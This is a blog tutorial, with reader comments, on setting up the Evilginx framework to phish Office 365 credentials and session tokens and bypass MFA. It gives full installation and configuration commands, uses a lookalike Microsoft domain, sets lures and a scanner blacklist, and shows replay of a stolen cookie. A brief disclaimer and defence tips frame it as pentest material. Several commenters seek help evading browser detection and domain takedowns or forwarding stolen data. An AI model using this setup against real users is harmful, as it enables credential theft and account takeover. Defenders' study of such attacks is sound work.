Skip to content

How to set up Evilginx to phish Office 365 credentials

Disclaimer
Evilginx can be used for nasty stuff. It is the defender's responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attacks. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties, or for educational purposes.

That being said: on with the show. Today a step-by-step tutorial on how to set up Evilginx and how to use it to phish for Office 365 or Azure Active Directory credentials. After reading this post, you should be able to spin up your own instance and do the basic configuration to get started.

Update 21-10-2022: Because of the high amount of comments from folks having issues, I created a quick tutorial where I ran through the steps.

What is Evilginx?

Evilginx is a man-in-the-middle attack framework used for phishing credentials along with session cookies, which can then be used to bypass 2-factor authentication protection. The framework can use so-called phishlets to mirror a website and trick the users to enter credentials, for example, Office 365, Gmail, or Netflix. Since it is open source, many phishlets are available, ready to use. Today, we focus on the Office 365 phishlet, which is included in the main version.

What do we need?

So, in order to get this piece up and running, we need a couple of things:

  • an internet-facing VPS or VM running Linux. Evilginx runs very well on the most basic Debian 8 VPS.
  • a domain name that is used for phishing, and access to the DNS config panel
  • a target domain in Office 365 that is using password hash sync or cloud-only accounts. (ADFS is also supported but is not covered in detail in this post)

I also want to point out that the default documentation on Github is also very helpful. Also check the issues page, if you have additional questions, or run into problem during installation or configuration. This post is based on Linux Debian, but might also work with other distro’s.

Step 1 – Spin up the VPS

First, we need a VPS or droplet of your choice. I found one at Vimexx for a couple of bucks per month.

Select Debian as your operating system, and you are good to go.

As soon as your VPS is ready, take note of the public IP address. We need that in our next step.

Step 2 – Domain & DNS glue records

Next, we need our phishing domain. I bought one at TransIP: miicrosofttonline.com

The easiest way to get this working is to set glue records for the domain that points to your VPS. Not all providers allow you to do that, so reach out to the support folks if you need help. Check here if you need more guidance.

If your domain is also hosted at TransIP, unselect the default TransIP-settings toggle, and change the nameservers to ns1.yourdomain.com and ns2.yourdomain.com. Next, ensure that the IPv4 records are pointing towards the IP of your VPS.

Step 3 – Install Evilginx

Next, we need to install Evilginx on our VPS. So to start off, connect to your VPS. I use ssh with the Windows terminal to connect, but some providers offer a web-based console as well.

First, we need to make sure wget is installed:

sudo apt update 

sudo apt install wget -y

Next, download the Go installation files:

wget https://golang.org/dl/go1.17.linux-amd64.tar.gz

Install Go by running this command:

sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/

Next, we need to configure the PATH environment variable by running:

echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh

source /etc/profile.d/go.sh
....... The source files are from my personal Github page. This version includes an updated yaml file for the o365 phishlet, since the original one does not capture the session token, and does not support KMSI and Temporary Access Pass. If you don't feel comfortable pulling it from my Github, change the path to https://github.com/kgretzky/evilginx2.git to pull it from the original source. You will need to manually edit the Office 365 phishlet (located in /usr/share/evilginx/phishlets) and replace it with this file. 

Run the following cmdlets to clone the source files from Github:

sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make

After that, we can install Evilginx globally and run it:

sudo make install
sudo evilginx

We now have Evilginx running, so in the next step, we take care of the configuration.

A couple of handy cmdlets that you might need along the way:

ActionCommand
Start Evilginxsudo evilginx
Close Evilginxexit
Get the phising URLlures get-url <id>
Get the running configconfig
See all phishletsphishlets
See all sessionssessions
Get details from specific sessionsessions <id>
Clear screenclear
Hide the Office 365 phishletphishlets hide o365
Unhide the Office 365 phishletphishlets unhide o365
Take note of the locations for phishlets and config files

Step 3 – Configure Evilginx

Okay, this is the last and final step to get Evilginx up and running.
First, we need to set the domain and IP (replace domain and IP to your own values!).
Optional, set the blacklist to unauth to block scanners and unwanted visitors. This is highly recommended.

config domain <yourdomain>
config ip <yourIP>
blacklist unauth

Next, we configure the Office 365 phishlet to match our domain:

phishlets hostname o365 <yourdomain>
phishlets enable o365

If you get an SSL/TLS error at this point, your DNS records are not (yet) in place. When a phishlet is enabled, Evilginx will request a free SSL certificate from LetsEncrypt for the new domain, which requires the domain to be reachable. As soon as the new SSL certificate is active, you can expect some traffic from scanners! If you changed the blacklist to unauth earlier, these scanners would be blocked.

In the next step, we are going to set the lure for Office 365 phishlet and also set the redirect URL. This URL is used after the credentials are phished and can be anything you like. In this case, we use https://portal.office.com/.

lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0

Our phishlet is now active and can be accessed by the URL https://login.miicrosofttonline.com/tHKNkmJt (no longer active )

You will be handled as an ‘authenticated’ session when using the URL from the lure and, therefore, not blocked.

At this point, you can also deactivate your phishlet by hiding it.

phishlets hide o365

To unhide the phishlet, simply run:

phishlets unhide o365

At all times within the application, you can run help or help <command> to get more information on the cmdlets.

Fun fact: the default redirect URL is a funny cat video that you definitely should check out: https://www.youtube.com/watch?v=dQw4w9WgXcQ

Capture MFA protected session

Okay, time for action. Let’s see how this works.

In this video, session details are captured using Evilginx. The session is protected with MFA, and the user has a very strong password.

  1. User enters the phishing URL, and is provided with the Office 365 sign-in screen.
  2. Username is entered, and company branding is pulled from Azure AD.
  3. User provides password.
  4. User is prompted for MFA.
  5. User is prompted for KMSI cookie.
  6. User is redirected to the redirect URL.
  7. Credentials and session token is captured.

If you try to phish a non-office 365 account, you’ll get this error:

We’re unable to complete your request

invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application.

Replay stolen token

In this video, the captured token is imported into Google Chrome.

  1. Browse to https://portal.office.com.
  2. No user is signed-in.
  3. Cookie is deleted using the browser extension.
  4. Cookie is copied from Evilginx, and imported into the session.
  5. After a page refresh the session is established, and MFA is bypassed.

What if the target is using ADFS?

If the target domain is using ADFS, you should update the yaml file with the corresponding ADFS domain information.

cd /
cd usr/share/evilginx/phishlets/
sudo nano o365.yaml

How to protect your Office 365 credentials

Okay, now on to the stuff that really matters: how to prevent phishing? You can do a lot to protect your users from being phished. Please reach out to my previous post about this very subject to learn more:

10 tips to secure your identities in Microsoft 365 – JanBakker.tech

I want to point out one specific tip: go passwordless as soon as possible, either by using Windows Hello for Business, FIDO2 keys, or passkeys (Microsoft Authenticator app). If you still rely on Azure MFA, please consider using FIDO2 keys as your MFA method: Use a FIDO2 security key as Azure MFA verification method – JanBakker.tech

More community resources:
Why using a FIDO2 security key is important – Cloudbrothers
Protect against AiTM/ MFA phishing attacks using Microsoft technology (jeffreyappel.nl)

Stay safe!

59 thoughts on “How to set up Evilginx to phish Office 365 credentials”

  1. Pingback: [m365weekly] #82 - M365 Weekly Newsletter

  2. Can use regular O365 auth but not 2fa tokens. I get a Invalid postback url error in microsoft login context. That usually works with the kgretzgy build.

        1. Hey Jan, Thanks for the reply…I tried with another server and followed this exact same step but having problems with getting ssl for the subdomains. login and www. I’m guessing it has to do with the name server propagation.

          Regards

          1. I think this has to do with DNS. Did you use glue records? Try adding both www and login A records, and point them to your VPS. (might take some time)

    1. Hi Matt, try adding the following to your o365.yaml file

      – {phish_sub: ‘login’, orig_sub: ‘login’, domain: ‘microsoft.com’, session: true, is_landing: true}

  3. invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application.

  4. Thanks for the writeup. Unfortunately, I can’t seem to capture the token (with the file from your github site). Is there a piece of configuration not mentioned in your article?

    Thanks again!

    1. That’s odd. Are you sure you have edited the right one? Take a look at the location where Evilginx is getting the YAML files from. You can see that when you start Evilginx

    1. The redirect URL of the lure is the one the user will see after the phish. The Rickroll video, is the default URL for hidden phishlets or blacklist.

      Type help config to change that URL. config redirect_url

      1. Yes but the lure link don’t show me the login page it just redirects to the video. No login page Nothing. it only showed the login page once and after that it keeps redirecting

  5. I have my own custom domain. I have the DNS records pointing to the correct IP (I can spin up a python simple http server and access it). I made evilginx from source on an updated Manjaro machine. I get no error when starting up evilginx2 with sudo (no issues with any of the ports). I set up the config (domain and ip) and set up a phishlet (outlook for this example). I set up the phishlet address with either just the base domain, or with a subdomain, I get the same results with either option. I enable the phislet, receive that it is setting up certificates, and in green I get confirmation of certificates for the domain.

    When I visit the domain, I am taken straight to the Rick Youtube video. No glimpse of a login page, and no invalid cert message. In the Evilginx terminal I get an error of an unauthorized request to the domain in question that I visited with reference to the correct browser. I have tried access with different browsers as well as different IPs same result.

    What am I not setting up correctly?

    Thank you

    1. Hi Raph, this can either mean that the phishlet is hidden or disabled, or that your IP is blacklisted. Make sure you are using the right URL, received from lures get-url

      You can find the blacklist in the root of the Evilginx folder. Please check if your WAN IP is listed there. While testing, that sometimes happens…

  6. Oh Thanks, actually I figured out after two days of total frustration, that the issue was that I didn’t start up evilginx with ‘SUDO’. unbelievable error but I figured it out and that is all that mattered.

  7. Hi Jan, how are you?

    Do you have any documented process to link webhook so as to get captured data in email or telegram?

    Also, why is the phishlet not capturing cookies but only username and password?

  8. Hey Jan – using the Phishlet, works as expected for capturing credentials as well as the session tokens. However when you attempt to “Sign in with a security key” there is a redirection which leads to a

    “ADSTS135004 Invalid PostbackUrlParameter”

    This prevents the demonstration of authenticating with a Security Key to validate origin binding control of FIDO2.

    Any ideas?

    1. Hi Shak, try adding the following to your o365.yaml file

      – {phish_sub: ‘login’, orig_sub: ‘login’, domain: ‘microsoft.com’, session: true, is_landing: true}

      1. Hi, I noticed that the line was added to the github phishlet file. Sadly I am still facing the same “ADSTS135004 Invalid PostbackUrl Parameter” error when trying fido2 signin even with the added phish_sub line.

  9. Hi Jan,

    I tried with new o365 YAML but still i am unable to get the session token.

    Some its intercepting the username and password but sometimes its throwing like after MFA its been stuck in the same page its not redirecting to original page.

    I applied the configuration “lures edit 0 redirect_url https://portal.office.com

    Microsoft
    Sign in
    There was an issue looking up your account. Tap Next to try again.

    1. Same question as Scott – updating the YAML file to remove placeholders breaks capture entirely – an example of proper formatting would be very helpful.

  10. [outlook.microsioft.live] acme: error: 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVcheck that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for outlook.microsioft.live – check that a DNS record exists for this domain, url:

    1. Hi Thad, this issue seems DNS related. You need to add both IPv4 and IPv6 A records for outlook.microsioft.live
      Better: use glue records

  11. Hey Jan – any idea how you can include Certificate Based Authentication as part of one of the “prevention” scenarios? Seems when you attempt to log in with Certificate, there is a redirect to certauth.login.domain.com. in addition to DNS records it seems we would need to add certauth.login.domain.com to the certificate? Let me know your thoughts.

  12. Please help

    07:50:57] [inf] requesting SSL/TLS certificates from LetsEncrypt…
    [07:50:57] [!!!] get directory at ‘https://acme-v02.api.letsencrypt.org/directory’: Get “https://acme-v02.api.letsencrypt.org/directory”: dial tcp: lookup acme-v02.api.letsencrypt.org: Temporary failure in name resolution
    [07:50:57] [inf] disabled phishlet ‘o365’
    :

  13. I have been trying to setup evilginx2 since quite a while but was failing at one step. Can you please help me out?

    1) My free cloud server IP 149.248.1.155 (Ubuntu Server) hosted in Vultr.

    2) Domain microsoftaccclogin.cf and DNS pointing to my 149.248.1.155.

    3) URL (www.microsoftaccclogin.cf) is also loading.

    4) Getting the following error even after using https://github.com/BakkerJan/evilginx2.git which has updated o365 phishlet.

    [12:44:22] [!!!] acme: Error -> One or more domains had a problem:
    [login.microsoftaccclogin.cf] acme: error: 400 :: urn:ietf:params:acme:error:dns :: DNS problem: NXDOMAIN looking up A for login.microsoftaccclogin.cf – check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for login.microsoftaccclogin.cf – check that a DNS record exists for this domain, url:
    [www.microsoftaccclogin.cf] acme: error: 403 :: urn:ietf:params:acme:error:unauthorized :: 149.248.1.155: Invalid response from http://www.microsoftaccclogin.cf/.well-known/acme-challenge/QQ1IwQLmgAhk4NLQYkhgHfJEFi38w11sDrgiUL8Up3M: 404, url:

    I have checked my DNS records and they are configured correctly. I hope you can help me with this issue! I am a noob in cybersecurity just trying to learn more.

  14. I was able to set it up right but once i give the user ID and password in Microsoft page it gives me the below error. I have used your github clonehttps://github.com/BakkerJan/evilginx2.git

    invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application

    Also the my Domain is getting blocked and taken down in 15 minutes. In domain admin pannel its showing fraud. May be they are some online scanners which was reporting my domain as fraud. How can I get rid of this domain blocking issue and also resolve that “invalid_request” error?
    Please help me! Thank you.

  15. I got the phishing url up and running but getting the below error

    “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    Was something changed at Microsoft end?
    below is my config

    config domain jamitextcheck.ml
    config ip 107.191.48.124
    blacklist unauth

    phishlets hostname o365 jamitextcheck.ml
    phishlets enable o365

    lures create o365

    lures edit 0 redirect_url https://login.live.com/
    also tried with lures edit 0 redirect_url https://portal.office.com

    lures get-url 0

  16. I have tried everything the same after giving the username in phishing page the below was the error

    “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    Can you please help me?

  17. I have watched your recent video from youtube still find the below error after giving username

    “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    Can you please help me?

    1. What’s your target? This error is also shown if you use Microsoft MSA accounts like outlook.com or live.com
      You can only use this with Office 365 / Azure AD tenants.

  18. For all that have the “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    This error occurs when you use an account without a valid o365 subscription. A basic *@outlook.com won’t work.

    1. Thanks, that’s correct. Just tested that, and added it to the post.
      You’ll need the Outlook phishlet for that, as this one is using other URL’s

  19. Failed to start nameserver on port 53
    listen tcp :443: bind: address already in use

    Please can i fix this problem, i did everything and it worked perfectly before i encounter the above problem, i have tried to install apache to stop the port but its not working. Please how do i resolve this? i do not mind to give you few bitcoin.

    Thank you

  20. Hello, thanks for this post

    sorry but your post is not working for me … my DNS is configured correctly and i have alwase the same issue

    acme: Error -> One or more domains had a problem:
    [login.loginauth.mscloudsec.com] acme: error: 400 :: urn:ietf:params:acme:error:dns :: DNS problem: NXDOMAIN looking up A for login.loginauth.mscloudsec.com – check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for login.loginauth.mscloudsec.com – check that a DNS record exists for this domain, url:
    [www.loginauth.mscloudsec.com] acme: error: 400 :: urn:ietf:params:acme:error:connection :: 20.65.97.63: Fetching http://www.loginauth.mscloudsec.com/.well-known/acme-challenge/y5aoNnpkHLhrq13znYMd5w5Bb44bGJPikCKr3R6dgdc: Timeout during connect (likely firewall problem), url:

    please could you share exactly the good DNS configuration ?

  21. Hi Jan,
    Evilginx is working perfect for me. However, it gets detected by Chrome, Edge browsers as Phishing.

    Error message from Edge browser -> “The server presented a certificate that wasn’t publicly disclosed using the Certificate Transparency policy. This is required for some certificates to make sure they are trustworthy and to protect against attackers.”

    Is there any way to get around this?

  22. hello i need some help i did all the steps correctly but whenever i go to the lures url that was provided im taken str8 to the rick roll video, the link doesn’t even take me to the phishlet landing page?? does anyone know why it does this or did i do something wrong in the configuration setup in evilgnix2?? your feedback will be greatly appreciated. thnak you

Leave a Reply

Your email address will not be published. Required fields are marked *